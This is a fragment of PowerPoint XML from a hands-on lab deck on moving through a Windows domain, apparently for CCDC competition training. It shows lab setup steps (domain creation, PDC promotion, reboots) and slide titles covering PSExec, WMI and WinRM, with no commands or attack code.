              <a:t>Create domain, users, and promote to PDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reboot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now other machines can be created.  Each one requires a reboot to join domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*The Kali instance does not wait for the PDC to be available</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274801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C6ADC-293A-4308-88AF-FEE935B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Remote Management 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347CF-D930-4159-8ECF-8C920D48A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11225</TotalTime>
  <Words>1926</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen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Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>Hands on Lab: Migrating Through a Windows Domain</vt:lpstr>
      <vt:lpstr>Contents</vt:lpstr>
      <vt:lpstr>Lab Environment – Basic Goals</vt:lpstr>
      <vt:lpstr>Setup Steps - Part 1</vt:lpstr>
      <vt:lpstr>Setup Steps - Part 2</vt:lpstr>
      <vt:lpstr>LaB Environment – Terraform</vt:lpstr>
      <vt:lpstr>Lab Environment – Terraform Config</vt:lpstr>
      <vt:lpstr>Lab Environment – What’s Being Automated</vt:lpstr>
      <vt:lpstr>Windows Remote Management Protocols</vt:lpstr>
      <vt:lpstr>Three Main Protocols</vt:lpstr>
      <vt:lpstr>PSExec - Details</vt:lpstr>
      <vt:lpstr>PSExec – How it Works</vt:lpstr>
      <vt:lpstr>Command Line Usage</vt:lpstr>
      <vt:lpstr>Tips</vt:lpstr>
      <vt:lpstr>WMI - Details</vt:lpstr>
      <vt:lpstr>Command Line Usage</vt:lpstr>
      <vt:lpstr>More Useful ComMands</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>WMI Eventing Example</vt:lpstr>
      <vt:lpstr>WinRM - Details</vt:lpstr>
      <vt:lpstr>Command Line Usage</vt:lpstr>
      <vt:lpstr>Typical CCDC Setup</vt:lpstr>
      <vt:lpstr>Your goal(s)</vt:lpstr>
      <vt:lpstr>The Challenges</vt:lpstr>
      <vt:lpstr>Common Tools</vt:lpstr>
      <vt:lpstr>Make a Gameplan</vt:lpstr>
      <vt:lpstr>Now Do EEEEEET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Xync</dc:creator>
  <cp:lastModifiedBy>Xync</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-11T20:59:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-19T16:13:09Z</dcterms:modified>
</cp:coreProperties>
</file>